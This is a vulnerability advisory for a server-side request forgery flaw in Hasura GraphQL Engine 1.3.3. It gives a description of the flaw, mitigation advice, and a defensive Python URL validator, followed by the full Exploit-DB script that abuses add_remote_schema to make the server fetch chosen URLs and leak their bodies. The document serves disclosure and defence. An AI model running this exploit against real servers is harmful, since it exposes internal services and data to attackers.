Vendor: GraphQL Engine
Author: Dolev Farhi
CVSS: 8.8 (HIGH)
CWE: 918, Server-Side Request Forgery (SSRF)
Product Name: GraphQL Engine
Affected Version From: 1.3.3
Affected Version To: 1.3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:hasura:graphql-engine
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
Year: 2021

Hasura GraphQL 1.3.3 – Service Side Request Forgery (SSRF)

Hasura GraphQL 1.3.3 is vulnerable to Server-Side Request Forgery (SSRF) through its metadata API: an `add_remote_schema` request sent to the `/v1/query` endpoint makes the Hasura server itself fetch the URL supplied in the schema definition. An attacker can use this to send requests to internal services that are not reachable from the external network, and because the error response echoes the fetched response body (`raw_body`), the contents of those internal responses are returned to the attacker. This can be used to gain access to sensitive information or to perform other malicious activities.

Mitigation:

The best way to mitigate SSRF is to validate the user-supplied URL and ensure that it does not point to any internal service (loopback, private ranges, link-local and cloud metadata addresses). Because the fetch is performed by the server, the check has to be made against the address the hostname actually resolves to at fetch time, and it must also be applied to any redirect the target returns.
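One way to implement the URL validation described above, as an added example in Python (not Hasura's own code): the check parses the URL, resolves the hostname, and rejects any target that is not a globally routable address. The `resolve` parameter and the constructed `FAKE_DNS` table are assumptions that let the example run offline; `real_resolve` is the network-backed default.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS table so the example runs offline (assumption, not real records).
FAKE_DNS = {
    "schema.example.com": {"93.184.216.34"},
    "db.internal": {"10.0.0.5"},
    "rebind.example": {"93.184.216.34", "127.0.0.1"},  # one public, one loopback
}

def fake_resolve(host):
    return FAKE_DNS.get(host, set())

def real_resolve(host):
    """All A/AAAA records for host via the system resolver (needs network)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_safe_remote_schema_url(url, resolve=real_resolve):
    """Return (ok, reason) for a URL the server itself would fetch. Rejects
    loopback, private, link-local (cloud metadata), multicast, reserved and
    unspecified targets, including IPv4-mapped IPv6 forms of them."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable url"
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "localhost"
    try:  # literal IP address: no DNS lookup needed
        addrs = {ipaddress.ip_address(host)}
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (socket.gaierror, ValueError):
            addrs = set()
    if not addrs:
        return False, "unresolvable host"
    # Every record must be public; a single internal record rejects the name.
    for addr in addrs:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped
        if addr.is_multicast or not addr.is_global:
            return False, "non-public address {}".format(addr)
    return True, "ok"
```

The resolved address can change between this check and the server's actual request, so the HTTP client that performs the fetch should re-validate the connected address and either refuse redirects or run the same check on each redirect target.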

Exploit-DB raw data:

# Exploit Title: Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu

import requests

# Target Hasura instance (placeholder values from the original script)
HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80

# URL the Hasura server will be made to fetch (placeholder from the original script)
REMOTE_URL = 'http://some_remote_addr'

def SSRF(url):
  # add_remote_schema makes the server issue an introspection request to the
  # supplied URL; the metadata API is served at /v1/query.
  data = {
    "type": "bulk",
    "args": [
      {
        "type": "add_remote_schema",
        "args": {
          "name": "test",
          "definition": {
            "url": url,
            "headers": [],
            "timeout_seconds": 60,
            "forward_client_headers": True
          }
        }
      }
    ]
  }
  endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
  r = requests.post(endpoint, json=data)
  return r.json()

res = SSRF(REMOTE_URL)

message = ''
raw_body = ''

# When the fetched URL does not return a valid GraphQL schema, the error
# response carries an 'internal' object describing the fetch, including the
# raw response body of the target. Responses without it are tolerated.
try:
  message = str(res['internal'].get('message', ''))
  raw_body = str(res['internal'].get('raw_body', ''))
except (KeyError, TypeError, AttributeError):
  pass

print('Remote URL: ' + REMOTE_URL)
print('Message: ' + message)
print('HTTP Raw Body: ' + raw_body)
print('Error: ' + str(res.get('error', '')))